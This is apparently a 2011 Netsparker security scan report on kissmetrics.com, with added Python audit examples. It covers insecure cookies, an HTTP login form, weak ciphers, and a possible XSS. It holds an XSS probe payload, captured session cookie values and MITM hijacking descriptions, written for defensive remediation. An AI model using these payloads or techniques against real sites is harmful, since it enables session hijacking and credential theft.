(See "<b>Changing or Deleting Information</b>," below.)</li> </ul> <p><i>Log Data.</i> When you visit the Site, whether as a KISSmetrics Customer or a non-registered user just browsing (any of these, a "<b>KISSmetrics User</b>"), our servers automatically record information that your browser sends whenever you visit a website ("<b>Log Data</b>"). This Log Data may include information such as your computer’s Internet Protocol ("<b>IP</b>") address, browser type or the webpage you were visiting before you came to our Site, pages of our Site that you visit, the time spent on those pages, information you search for on our Site, access times and dates, and other statistics. We use this information to monitor and analyze use of the Site and the Service and for the Site’s technical administration, to increase our Site’s functionality and user-friendliness, and to better tailor it to our visitors’ needs.</p> <h3>Cookies</h3> <p>Like many websites, we use "cookies" to collect information. A cookie is a small data file that we transfer to your computer’s hard disk for record-keeping purposes. We use cookies for two purposes. First, we utilize persistent cookies to save your registration ID and login password for future logins to the Site. Second, we utilize session ID cookies to enable certain features of the Site, to better understand how you interact with the Site and to monitor aggregate usage by KISSmetrics Users and web traffic routing on the Site. Unlike persistent cookies, session cookies are deleted from your computer when you log off from the Site and Service and then close your browser. Third-party advertisers on the Site may also place or read cookies on your browser. You can instruct your browser, by changing its options, to stop accepting cookies or to prompt you before accepting a cookie from the websites you visit. 
If you do not accept cookies, however, you may not be able to use all portions of the Site or all functionality of the Service.</p> <h3>Phishing</h3> <p>Identity theft and the practice currently known as "phishing" are of great concern to KISSmetrics. Safeguarding information to help protect you from identity theft is a top priority. We do not and will not, at any time, request your credit card information, your account ID, login password, or national identification numbers in a non-secure or unsolicited e-mail or telephone communication. For more information about phishing, visit the Federal Trade Commission’s website.</p> <h3>Information Sharing and Disclosure</h3> <p><i>Aggregate Information and Non-Identifying Information.</i> We may share aggregated information that does not include personally identifiable information and we may otherwise disclose non-identifying Information and Log Data with third parties for industry analysis, demographic profiling and other purposes. Any aggregated information shared in these contexts will not contain your personally identifiable information.</p> <p><i>Service Providers.</i> We may employ third-party companies and individuals to facilitate our Site and Service, to provide the Service on our behalf, to perform Site-related services (e.g., without limitation, maintenance services, database management, web analytics and improvement of the Site’s features) or to assist us in analyzing how our Site and Service are used. These third parties have access to your personally identifiable information only to perform these tasks on our behalf and are obligated not to disclose or use it for any other purpose.</p> <p><i>Compliance with Laws and Law Enforcement.</i> KISSmetrics cooperates with government and law enforcement officials and private parties to enforce and comply with the law. 
We will disclose any information about you to government or law enforcement officials or private parties as we, in our sole discretion, believe necessary or appropriate to respond to claims and legal process (including but not limited to subpoenas), to protect the property and rights of KISSmetrics or a third party, to protect the safety of the public or any person, or to prevent or stop activity we may consider to be, or to pose a risk of being, any illegal, unethical or legally actionable activity. </p> <p><i>Business Transfers.</i> KISSmetrics may sell, transfer or otherwise share some or all of its assets, including your personally identifiable information, in connection with a merger, acquisition, reorganization or sale of assets or in the event of bankruptcy. </p> <h3>Changing or Deleting Your Information</h3> <p>All KISSmetrics Customers may review, update, correct or delete the personally identifiable information in their registration profile by contacting us. If you completely delete all such information, then your account may become deactivated. If you would like us to delete your record in our system, please contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a> with a request that we delete your personally identifiable information from our database. We will use commercially reasonable efforts to honor your request. We may retain an archived copy of your records as required by law or for legitimate business purposes.</p> <h3>Security</h3> <p>KISSmetrics is very concerned with safeguarding your information. 
We employ administrative, physical and electronic measures designed to protect your information from unauthorized access.</p> <p>We will make any legally required disclosures of any breach of the security, confidentiality, or integrity of your unencrypted electronically stored "personal data" (as defined in applicable state statutes on security breach notification) to you via email or conspicuous posting on this Site in the most expedient time possible and without unreasonable delay, insofar as consistent with (i) the legitimate needs of law enforcement or (ii) any measures necessary to determine the scope of the breach and restore the reasonable integrity of the data system.</p> <h3>International Transfer</h3> <p>Your information may be transferred to — and maintained on — computers located outside of your state, province, country or other governmental jurisdiction where the privacy laws may not be as protective as those in your jurisdiction. If you are located outside the United States and choose to provide information to us, KISSmetrics transfers personally identifiable information to the United States and processes it there. Your consent to this Privacy Policy followed by your submission of such information represents your agreement to that transfer.</p> <h3>Links to Other Sites</h3> <p>Our Site contains links to other websites. If you choose to visit a third party website, e.g. an advertiser by "clicking on" a banner ad or other type of advertisement, or click on another third-party link, you will be directed to that third party’s website. The fact that we link to a website or present a banner ad or other type of advertisement is not an endorsement, authorization or representation of our affiliation with that third party, nor is it an endorsement of their privacy or information security policies or practices. We do not exercise control over third-party websites. 
These other websites may place their own cookies or other files on your computer, collect data or solicit personal information from you. Other sites follow different rules regarding the use or disclosure of the personal information you submit to them. We encourage you to read the privacy policies or statements of the other websites you visit.</p> <h3>Our Policy Toward Children</h3> <p>Our Site and Service is not directed to children under 13. We do not knowingly collect personally identifiable information from children under 13. If a parent or guardian becomes aware that his or her child has provided us with personally identifiable information without their consent, he or she should contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a>. If we become aware that a child under 13 has provided us with personally identifiable information, we will delete such information from our files.</p> <h3>Aligning Your Privacy Policy With Our Tools</h3> <p>For information on how you can align your KISSmetrics installation with your privacy policy please <a href="http://support.kissmetrics.com/misc/user-privacy">see here</a>.</p> <h3>Contacting Us</h3> <p>If you have any questions about this Privacy Policy, please contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a>.</p></div><!-- /.wrap --> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" 
target="_new" title="Visit the KISSmetrics Mark..
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
The sid cookie was issued over HTTPS without the Secure attribute. A cookie that lacks that attribute is also sent by the browser on plain HTTP requests to the same host, so it can be read by anyone able to observe that traffic or sitting in a man-in-the-middle (MITM) position, with no need to break TLS at all.

Impact

Because the Secure attribute is absent, the browser will send this cookie over any HTTP connection to the host. If the cookie is a session identifier, as a cookie named sid is likely to be, an attacker who observes such a request can replay the value and hijack the victim's session. An attacker in a MITM position does not have to wait for the victim to type a plain-HTTP URL: they can make the victim's browser issue one (for instance by injecting a link to http://www.kissmetrics.com/ into any unencrypted page the victim loads) and capture the cookie from that request.

Actions to Take

  1. See the remedy for solution.
  2. Mark every cookie the application sets with the Secure attribute. (A cookie that neither authenticates the user nor carries personal information can be left without it, but a session cookie such as sid must have it.)

Remedy

Set the Secure attribute on all cookies used within the application, and the HttpOnly attribute as well wherever client-side script does not need to read the cookie (the missing HttpOnly flag on this same cookie is listed as a separate finding in the summary). Once the whole site is served over HTTPS, the session cookie then never leaves the browser in clear text.

Required Skills for Successful Exploitation

To exploit this issue the attacker must be able to observe or intercept the victim's HTTP traffic. That normally means being on the same local network as the victim or the server (for example a shared wireless network, where layer-2 techniques such as ARP spoofing put the attacker on-path), having compromised a system on a hop between the two, or otherwise controlling a network the victim's traffic crosses.

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /privacy

/privacy CONFIRMED

https://www.kissmetrics.com/privacy

Identified Cookie

sid

Request

HEAD /privacy HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Accept: netsparker/check
Cache-Control: no-cache
Host: www.kissmetrics.com
Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:35:10 GMT
Server: nginx
Set-Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553; path=/
Vary: Accept-Encoding
Connection: keep-alive
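The check below, added here as an example and not part of the Netsparker report or of the KISSmetrics site, parses the Set-Cookie headers of a captured response and reports cookies that lack the Secure or HttpOnly attribute, which covers this finding and the companion "Cookie Not Marked As HttpOnly" finding in the summary. The captured headers are transcribed from the response above (the empty Content-Encoding line is dropped), the hardened variant is constructed to show what the remedy asks for, and the attribute policy is this example's own. The last function only splits the visible `payload--digest` shape of the sid value; the report does not say which framework produced it, so nothing more is assumed.

```python
"""Audit the Set-Cookie headers of a captured response for the Secure and
HttpOnly attributes.

Added example; it is not part of the Netsparker report or of the KISSmetrics
site. The response text is transcribed from the headers captured in the
report, the hardened variant is constructed to show what the remedy asks for,
and the attribute policy is this example's own.
"""
import base64
from dataclasses import dataclass
from urllib.parse import unquote

# Headers as captured in the report for HEAD /privacy over HTTPS (constructed
# copy; the empty Content-Encoding line from the capture is omitted).
CAPTURED_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:35:10 GMT
Server: nginx
Set-Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553; path=/
Vary: Accept-Encoding
Connection: keep-alive
"""

# The same cookie as the remedy would have it issued (constructed).
HARDENED_RESPONSE = CAPTURED_RESPONSE.replace(
    "path=/", "path=/; Secure; HttpOnly; SameSite=Lax")


@dataclass
class CookieFinding:
    name: str
    missing: list


def parse_set_cookie(header_value):
    """Split 'name=value; attr; attr=value' into (name, value, {attr: value});
    attribute names are lower-cased because they are case-insensitive."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_cookies(raw_response, served_over_https=True):
    """Return a CookieFinding for every Set-Cookie lacking Secure or HttpOnly.

    Secure is only checked for responses that came over HTTPS: a cookie set
    over plain HTTP is already exposed, and current browsers refuse to store
    a Secure cookie sent from an insecure origin anyway.
    """
    findings = []
    for line in raw_response.splitlines():
        if not line.lower().startswith("set-cookie:"):
            continue
        name, _value, attrs = parse_set_cookie(line.split(":", 1)[1])
        missing = []
        if served_over_https and "secure" not in attrs:
            missing.append("Secure")
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        if missing:
            findings.append(CookieFinding(name, missing))
    return findings


def split_signed_cookie(value):
    """Split a 'base64payload--hexdigest' cookie value into the decoded
    payload bytes and the digest. That is the visible shape of the captured
    sid; the report does not say which framework produced it, so nothing
    beyond the two parts is assumed here."""
    payload_b64, _, digest = unquote(value).partition("--")
    return base64.b64decode(payload_b64), digest
```

Run against the captured headers the audit reports `sid` with both attributes missing and nothing for the hardened variant. Splitting the captured sid gives a four-byte payload and a 40-hex-character digest (the length of a SHA-1 output); the longer sid values in the /login and /signup captures later in the report show the payload growing with content, which is consistent with a signed, serialized session rather than an opaque random identifier. That is worth knowing when the cookie travels over HTTP, because the structure leaks along with the session.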


Critical Form Served Over HTTP

Critical Form Served Over HTTP

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified that a page containing a password field was delivered over plain HTTP (http://www.kissmetrics.com/login), even though the form's action attribute points to https://www.kissmetrics.com/login.

Impact

The form posts to an HTTPS URL, but the page carrying the form was fetched over HTTP, and HTTPS on the destination does not protect a page that arrived in clear text. An attacker in a MITM position can modify that page before the browser renders it: inject JavaScript that reads the password as it is typed, or change the form's action to a plain-HTTP or attacker-controlled URL so the submission goes there instead. The user sees no certificate warning, because the browser never made a secure connection for the page itself.

This matters because it removes the protection SSL/TLS was meant to give the login: the credentials can be taken regardless of where the form would have posted.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP, and the forms that collect it must themselves be delivered over HTTPS. Every part of the application that accepts user input, starting with the login page, should be served only over HTTPS: redirect HTTP requests for those pages to their HTTPS equivalents instead of serving them, and once the whole host is available over HTTPS, send a Strict-Transport-Security header so that browsers stop making plain HTTP requests to it at all.

Classification

OWASP A9 PCI v1.2-6.5.9 PCI v2.0-6.5.4 CWE-311 WASC-04
- /login

/login CONFIRMED

http://www.kissmetrics.com/login

Form target action

https://www.kissmetrics.com/login

Request

POST /login HTTP/1.1
Referer: http://www.kissmetrics.com/privacy
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 30
Expect: 100-continue
Accept-Encoding: gzip, deflate

login=&password=&remember_me=1

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:40:24 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
Content-Length: 1580
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>Sign in to KISSmetrics</title> <!-- Meta --> <meta charset="utf-8" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/signin.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <section id="main"> <div class="inner"> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <form action="https://www.kissmetrics.com/login" id="sign-in-form" method="POST"> <h1>Sign in to KISSmetrics</h1> <p class="error">We were unable to sign you in. 
Please enter a login.</p> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <!-- <span class="forgot"><a href="forgot-password.php">I forgot my password</a></span> --> </p> <div style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p class="sign-in-btn"> <a href="#" class="blue button with_arrow" onclick="$('#sign-in-form').submit(); return false;">Sign in to KISSmetrics</a> <span id="remember">&nbsp;<input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in</span> </p> <p>Help: <a href="/forgot_password">I forgot my password.</a></p></form><p class="center">Dont&rsquo;t have an account? <a href="/signup">Start your free 30-day trial now.</a></p> </div><!-- /.inner --> </section> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script> <script src="/javascript/external.1669.js" type="text/javascript"></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-1160402-19"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- "production" r 1669/1669 --> </body></html>
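The following check, added as an example and not taken from the Netsparker report or the KISSmetrics code, finds password fields in a page and decides whether the page was delivered insecurely or submits insecurely, the two cases this finding distinguishes. The HTML is a constructed cut-down copy of the /login response captured above; the rule set is this example's own.

```python
"""Flag password fields on pages delivered over plain HTTP, or posting to it.

Added example, not part of the Netsparker report or the KISSmetrics code.
The HTML fragment is a cut-down copy of the /login response captured in
the report; the rule set is this example's own.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed excerpt of the captured http://www.kissmetrics.com/login body.
LOGIN_PAGE = """<form action="https://www.kissmetrics.com/login" id="sign-in-form" method="POST">
  <input class="text" name="login" value="" id="email" type="text"/>
  <input type="password" class="text" name="password" id="password" />
  <input type="checkbox" name="remember_me" value="1" checked="checked" />
</form>"""


class _FormScanner(HTMLParser):
    """Collect each form's action and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []          # list of {"action": str, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self._current is None:      # password input outside any form
                self._current = {"action": "", "has_password": False}
                self.forms.append(self._current)
            self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_password_forms(page_url, html):
    """Return finding strings for every form that carries a password field.

    Two cases are reported separately:
      - the page itself came over http://  -> an on-path attacker can rewrite
        the form before the browser sees it, whatever the action says
        (the report's "Critical Form Served Over HTTP");
      - the page came over https:// but the form posts to http://  -> the
        password itself crosses the wire in clear text.
    """
    scanner = _FormScanner()
    scanner.feed(html)
    scanner.close()
    page_scheme = urlparse(page_url).scheme.lower()
    findings = []
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        action = urljoin(page_url, form["action"] or page_url)
        action_scheme = urlparse(action).scheme.lower()
        if page_scheme != "https":
            findings.append(f"password form on {page_url} delivered over {page_scheme}; "
                            f"its action {action} can be rewritten by an on-path attacker")
        if action_scheme != "https":
            findings.append(f"password form on {page_url} submits to {action} (plaintext)")
    return findings
```

With the page URL taken from the capture (http://www.kissmetrics.com/login) the audit produces exactly the finding in this section; the same HTML fetched over https:// produces nothing, which is the state the remedy asks for.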
Weak Ciphers Detected

Weak Ciphers Detected

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker detected that the web server accepts at least one weak cipher suite for SSL/TLS connections.

Only strong cipher suites should be enabled, so that the confidentiality of traffic between the server and its visitors never depends on an algorithm that can be broken.

Impact

The suite found here, TLS_RSA_WITH_DES_CBC_SHA, encrypts the session with single DES, whose 56-bit key is small enough to be recovered by exhaustive search on dedicated hardware, as has been demonstrated since 1998. An attacker who records a session that negotiated this suite can therefore decrypt it offline. Current browsers no longer offer DES, so the exposure is limited to older clients that still do, but the suite gives the server nothing and should be removed.

Remedy

Configure your web server to refuse weak ciphers.

For Apache, modify the SSLCipherSuite directive in httpd.conf. The string below is the one the report suggested; its !LOW removes the single-DES suite found here (DES-CBC-SHA belongs to OpenSSL's LOW group), but it still permits RC4 and other suites that have since been shown to be weak and are no longer acceptable. A current configuration should start from HIGH and explicitly exclude RC4, 3DES and MD5 in addition to the exclusions below, and should also restrict SSLProtocol to TLS 1.2 and later.

	SSLCipherSuite ALL:!aNULL:!ADH:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM

For Microsoft IIS, the SChannel cipher set is controlled through the system registry:

  • Click Start, click Run, type regedt32 or regedit, and then click OK.
  • In Registry Editor, locate the key HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders.
  • Under it, create the following subkeys where they do not already exist and set an "Enabled" DWORD value of 0x0 in each:
    SCHANNEL\Ciphers\DES 56/56
    SCHANNEL\Ciphers\RC4 64/128
    SCHANNEL\Ciphers\RC4 40/128
    SCHANNEL\Ciphers\RC2 56/128
    SCHANNEL\Ciphers\RC2 40/128
    SCHANNEL\Ciphers\NULL
    SCHANNEL\Hashes\MD5
  • Restart the server for the SChannel changes to take effect. The list above is the report's; today SCHANNEL\Ciphers\RC4 128/128 and SCHANNEL\Ciphers\Triple DES 168 should be disabled in the same way.
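To see what a cipher string actually enables, rather than trusting it by inspection, the example below (added here; not part of the Netsparker report) evaluates a string with the local OpenSSL through Python's ssl module and flags suites whose names carry a weak algorithm. REPORT_REMEDY is the Apache string from the report; STRICT and the weak-token list are this example's own. The exact suite list returned depends on the OpenSSL build on the machine running it.

```python
"""Evaluate an OpenSSL cipher string and flag weak suites by name.

Added example, not part of the Netsparker report. It uses the local OpenSSL
build through Python's ssl module, so the exact suite list depends on the
machine; the classification rules are this example's own.
"""
import re
import ssl

# Suite reported by the scanner, in IANA naming.
REPORTED_WEAK = ["TLS_RSA_WITH_DES_CBC_SHA"]

# Remedy string from the report (it removes the LOW group, which holds single
# DES, but still allows RC4) and a stricter string for today's servers.
REPORT_REMEDY = "ALL:!aNULL:!ADH:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM"
STRICT = "HIGH:!aNULL:!eNULL:!MD5:!RC4:!3DES:!DES:!EXP"

# Tokens that mark a suite as weak in either IANA (TLS_RSA_WITH_DES_CBC_SHA)
# or OpenSSL (DES-CBC-SHA, RC4-SHA, EXP-RC2-CBC-MD5, DES-CBC3-SHA) naming.
_WEAK_TOKENS = {"NULL", "EXP", "EXPORT", "DES", "3DES", "RC4", "RC2", "MD5",
                "ANON", "ADH", "AECDH", "CBC3"}


def is_weak_suite(name):
    """True if any name token is in the weak set. Names are split on '-' and
    '_', so 'AES' and 'DES' are distinct tokens and AES suites are not caught."""
    tokens = set(re.split(r"[-_]", name.upper()))
    return bool(tokens & _WEAK_TOKENS)


def suites_for(cipher_string):
    """Return the suite names the local OpenSSL would offer for a cipher
    string. TLS 1.3 suites are always present; they are all strong."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.set_ciphers(cipher_string)   # raises ssl.SSLError if nothing matches
    return [c["name"] for c in ctx.get_ciphers()]


def weak_suites_in(cipher_string):
    """Weak suites a server configured with this string would accept."""
    return [n for n in suites_for(cipher_string) if is_weak_suite(n)]
```

`weak_suites_in(STRICT)` is empty on any current OpenSSL; `weak_suites_in(REPORT_REMEDY)` lists the RC4 suites on builds that still ship them, which is the point of preferring the stricter string. Against a live server the same classification can be applied to the suite names reported by `openssl s_client` or a scanner, which is how the single DES suite in this finding would be spotted.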
    

Classification

PCI v1.2-6.5.9 PCI v2.0-6.5.4 WASC-04
- /privacy

/privacy CONFIRMED

https://www.kissmetrics.com/privacy

List of Supported Weak Ciphers

  • TLS_RSA_WITH_DES_CBC_SHA

Request

GET /privacy HTTP/1.0
Accept: */*
Host: www.kissmetrics.com

Response

[NETSPARKER] SSL Connection
[Possible] Cross-site Scripting

[Possible] Cross-site Scripting

4 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute script (JavaScript, VBScript) in the context of the application, in the browser of a user who views a page into which the attacker's input has been reflected. This opens several attacks, most commonly hijacking the user's session or rewriting the page's HTML on the fly to capture credentials. It happens because input supplied by a user is written into the page in a way the browser interprets as HTML or script.

Netsparker believes there is an XSS here but could not confirm it automatically. The issue should be investigated manually to decide whether it is a real XSS that needs to be addressed. In this case the captured /signup response below contains the probe string reflected into the value attribute of the account[meta][url] input without any encoding: the probe's double quote closes the attribute and the </style></script><script>...</script> that follows is parsed as markup, which is exactly the unencoded reflection the scanner looks for. Submitting the form in a browser with such a value in the Company Website field would settle whether script runs.

XSS targets the application's users rather than the server. That limits what one payload can do, but because it allows hijacking other users' sessions, an attacker can aim it at an administrator and gain full control of the application.

Impact

There are many different attacks that can be leveraged through XSS, including:
  • hijacking a user's active session;
  • changing the look of the page within the victim's browser;
  • mounting a convincing phishing attack from the site's own origin;
  • reading and altering data the user enters into the page before it is sent.

Remedy

The issue occurs because the browser interprets the reflected input as active HTML, JavaScript or VBScript. To avoid this, every value the application writes into a page should be encoded for the exact context it lands in (HTML body, attribute value, JavaScript string, URL), since each context has its own metacharacters and encoding for the wrong context leaves the hole open. Input validation is a useful second layer but is not a substitute for output encoding.

Well-structured encoding libraries exist for most environments; at the time of this report the usual examples were OWASP Reform and the Microsoft Anti-Cross Site Scripting Library, both of which have since been retired in favour of the encoders built into current web frameworks.
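The example below is added here and is not part of the Netsparker report or of the KISSmetrics code. It reproduces the reflection visible in the captured /signup response (the excerpt is transcribed from that response), applies the byte-for-byte reflection test behind a "[Possible]" finding, parses the markup the way a browser would to show the injected script element, and puts the raw interpolation beside the attribute-context encoding that fixes it. The two render functions are stand-ins for whatever template produced the original markup.

```python
"""Check whether a probe value is reflected into a page unencoded, and show
the attribute encoding that closes the hole.

Added example; it is not part of the Netsparker report or of the KISSmetrics
code base. The response excerpt is transcribed from the /signup response the
report captured, and the two render functions are stand-ins (assumptions)
for whatever server-side template produced that markup.
"""
import html
from html.parser import HTMLParser

# The probe the scanner sent in account[meta][url], as shown in the report.
PROBE = """'"--></style></script><script>netsparker(0x0004B2)</script>"""

# Constructed excerpt of the captured /signup response body.
CAPTURED = ('<input type="text" class="text" name="account[meta][url]" '
            'value="' + PROBE + '" />')


def render_url_field_vulnerable(url):
    """Stand-in for the original template: raw interpolation into an attribute."""
    return ('<input type="text" class="text" name="account[meta][url]" '
            f'value="{url}" />')


def render_url_field_fixed(url):
    """Attribute-context encoding: &, <, >, " and ' are all escaped, so the
    value can neither terminate the attribute nor start a tag."""
    return ('<input type="text" class="text" name="account[meta][url]" '
            f'value="{html.escape(url, quote=True)}" />')


def reflected_unencoded(probe, body):
    """True if the probe appears byte-for-byte in the body, i.e. none of its
    metacharacters were encoded. This is the test behind a "[Possible]" XSS
    finding; it does not by itself prove that script executes."""
    return probe in body


class _TagCollector(HTMLParser):
    """Record the start tags a browser-like parser sees in the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(body):
    """Parse the markup as a browser would and return the start tags seen.
    For the captured response this exposes the attacker's <script> element,
    which only exists because the probe's quote ended the value attribute."""
    collector = _TagCollector()
    collector.feed(body)
    collector.close()
    return collector.tags
```

Rendering the probe through the vulnerable stand-in reproduces the captured markup exactly and the parser reports a `script` start tag after the `input`; through the fixed stand-in the probe is no longer present unencoded and the only tag left is the `input`. The same two checks, run on the real response to a manual submission, are what separates a "[Possible]" finding from a confirmed one.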

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /signup

/signup

https://www.kissmetrics.com/signup

Parameters

Parameter Type Value
trp POST 30
account%5bmeta%5d%5bname%5d POST Smith
account%5bname%5d POST Smith
account%5bmeta%5d%5bcompany_size%5d POST 1 to 5 people
account%5bmeta%5d%5burl%5d POST '"--></style></script><script>alert(0x0004B2)</script>
user%5blogin%5d POST 3
account%5bmeta%5d%5bphone%5d POST 3
user%5bnew_password%5d POST 3

Request

POST /signup HTTP/1.1
Referer: https://www.kissmetrics.com/signup/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 301
Expect: 100-continue
Accept-Encoding: gzip, deflate

trp=30&account%5bmeta%5d%5bname%5d=Smith&account%5bname%5d=Smith&account%5bmeta%5d%5bcompany_size%5d=1+to+5+people&account%5bmeta%5d%5burl%5d='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004B2)%3c%2fscript%3e&user%5blogin%5d=3&account%5bmeta%5d%5bphone%5d=3&user%5bnew_password%5d=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:42:44 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
Content-Length: 5129
Connection: keep-alive


